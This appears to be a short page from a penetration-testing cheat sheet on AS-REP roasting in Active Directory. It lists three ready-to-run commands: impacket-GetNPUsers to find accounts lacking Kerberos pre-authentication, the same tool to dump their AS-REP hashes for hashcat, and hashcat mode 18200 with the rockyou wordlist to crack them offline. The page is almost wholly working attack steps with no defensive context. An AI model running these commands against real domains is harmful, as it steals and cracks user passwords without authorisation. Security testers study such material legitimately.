As-Rep Roasting

Locate As-Rep Roastable Users (NTLM)

impacket-GetNPUsers $ADDOMAIN/$ADUSER -dc-ip $ADCONTROLLER

Collect As-Rep Tickets

impacket-GetNPUsers $ADDOMAIN/$ADUSER -dc-ip $ADCONTROLLER -format hashcat -outputfile asrep.hash

Crack Ticket

hashcat -m 18200 -a 0 asrep.hash /usr/share/wordlists/rockyou.txt
PreviousTimeroastingNextCreate Machine Account

Last updated